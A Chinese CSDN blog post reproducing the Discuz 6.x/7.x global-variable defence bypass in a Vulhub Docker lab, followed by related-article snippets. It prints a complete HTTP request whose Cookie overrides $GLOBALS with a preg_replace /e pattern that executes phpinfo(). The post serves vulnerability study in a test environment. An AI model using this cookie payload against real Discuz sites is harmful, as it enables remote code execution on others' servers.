Discuz 7.x、6.x 全局变量防御绕过导致代码执行

最新推荐文章于 2021-06-18 09:34:56 发布
最新推荐文章于 2021-06-18 09:34:56 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: Discuz 7.x、6.x
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84189474
版权

0x01 分析

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致 R E Q U E S T 中 不 再 包 含 _REQUEST中不再包含 REQUEST_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

具体原理请参考:

https://www.secpulse.com/archives/2338.html

0x02 环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101

0x03 启动环境

1、执行如下命令启动Discuz 7.2:
cd vulhub-master/discuz/wooyun-2010-080723/
sudo docker-compose up -d

在这里插入图片描述

sudo docker ps

在这里插入图片描述
已经启动

2、安装discuz

启动后,访问http://your-ip:8080/install/来安装discuz,数据库地址填写db,数据库名为discuz,数据库账号密码均为root。
在这里插入图片描述

0x04 漏洞复现

安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();:

GET /viewthread.php?tid=7&extra=page%3D1 HTTP/1.1
Host: 192.168.91.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.91.130:8080/forumdisplay.php?fid=2
Connection: close
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Upgrade-Insecure-Requests: 1

在这里插入图片描述
可见,phpinfo已成功执行:

网上文章说需要一个带表情评论的帖子,实际测试发现并不需要,这块仍需阅读代码来解释原因。

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
全局变量防御绕过漏洞演示
Chenamao的博客
08-09 473
目录 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub Docker简介: 搭建步骤: 让我们漏洞复现一下子: 全局变量防御绕过漏洞演示 漏洞环境搭建Vulhub 一款基于docker和docker-compose的漏洞环境部署平台。 vulhub官网地址:https://vulhub.org Docker简介: 是一个开源的应用容器引擎,基于Go语言并遵从Apache2.0协议开源。 可以让开发者打包到他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的Linu
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
LainWith的博客
08-07 223
作业题目:复现vulhub下的一个场景。地址 实际上,整个操作步骤,地址里面链接的网页已经写的很清楚了,只是安装数据库的时候注意一下,要按照人家是要求填写。 首先看一下我这里已经搭建好的环境 按照提示,我们只需要访问一个帖子,开抓包就行,这里随便点开一个帖子,然后篡改里面的cookie就行了 我这里放过这个数据包,就会出现phpinfo ...
Discuz! 6.x/7.x 全局变量防御绕过漏洞
weixin_34192732的博客
10-31 111
受影响产品: Discuz! 6.x/7.x 漏洞描述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞 include/global.func.php代码里: function daddslashes($string, $force = 0) { !defined...
Discuz x3.x模板 迪恩 教育培训课程V7 GBK.zip
12-03
《迪恩教育培训课程V7 GBK模板在Discuz x3.x平台的应用与解析》 Discuz! 是一款广泛使用的开源社区论坛系统,其强大的功能和灵活性吸引了众多网站管理员。迪恩教育培训机构推出的“迪恩教育培训课程V7 GBK”模板,...
Discuz x3.x插件 签到点击广告领积分3.0.zip
11-16
Discuz x3.x是一款广受欢迎的社区论坛系统,它以其强大的功能和灵活的扩展性赢得了众多用户的青睐。在这个数字化的时代,社区论坛不仅是用户交流的平台,也是商家推广产品和服务的有效渠道。而“签到点击广告领积分...
Discuz x3.x模板 迪恩教育课程职业培训3 商业版 GBK.zip
12-03
《迪恩教育课程职业培训3商业版GBK模板在Discuz x3.x平台的应用与解析》 Discuz x3.x是一款广泛应用于社区论坛建设的开源软件,以其强大的功能和灵活的扩展性深受用户喜爱。其中,“迪恩教育课程职业培训3商业版GBK...
Discuz X3.x迪恩微电影 商业版 GBK.zip
12-03
《迪恩微电影商业版GBK在Discuz X3.x平台的应用与详解》 迪恩微电影商业版GBK是一款专为Discuz X3.x论坛系统设计的视频网站模板,旨在为用户提供一套完整、专业的在线视频分享解决方案。GBK编码是中文字符集的一种...
Discuz x3.x模板 迪恩资讯创业财经 商业版 GBK.zip
12-03
《迪恩资讯创业财经商业版GBK模板在Discuz x3.x平台的应用详解》 Discuz x3.x模板“迪恩资讯创业财经商业版GBK”是一款专为Discuz论坛系统设计的专业模板,它针对财经、创业类网站进行了深度定制,旨在为用户提供更...
绕过全局变量防御导致代码执行
weixin_55541277的博客
06-18 203
[wooyun-2010-080723] 绕过全局变量防御导致代码执行 文章旨在记录个人收获以及知识分享,十分欢迎各位大佬纠正和补充 1.漏洞介绍 如果已经开启了 regeister_globals 配置,且在php5.3.x版本中 request_order配置默认为GP,导致Discuz!7.x/6.x版本可以绕过全局变量防御 regeister_globals 决定是否将EGPCS(即 Environment,Get,Post,Cookie,Server )变量注册为全局变量 request_or
Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
weixin_30794491的博客
07-08 330
漏洞概述: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。 漏洞分析: include/global.func.php代码里: 1 2 3 4 5 6 7 8 9 10 11 12 13 function dadds...
Discuz 7.x6.x 全局变量防御绕过导致代码执行(wooyun-2010-080723)
黑白的博客
12-06 528
声明 好好学习,天天向上 漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 影响范围 6.x 7.x 复现过程 使用vulhub 这里使用7.2版本 cd /app/vulhub-master/discuz/wooyun-2010-080723 启动 docker-compose
Discuz防注入函数绕过方法分析及没用心的修复补丁
kendyhj9999的专栏
02-08 932
Discuz防注入函数绕过方法分析及没用心的修复补丁 http://www.freebuf.com/articles/web/8038.html Seay @ WEB安全 2013-03-25 共 16676 人围观,发现 8 个不明物体收藏该文 分析人:晴天小铸,Seay 分析时间:2013年03月20日 discuz介绍: Crossday Discuz! Boar
SERVER全局变量绕过
最新发布
09-03
6.x/7.x 全局变量防御绕过导致命令执行](https://blog.csdn.net/weixin_42361708/article/details/115651776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值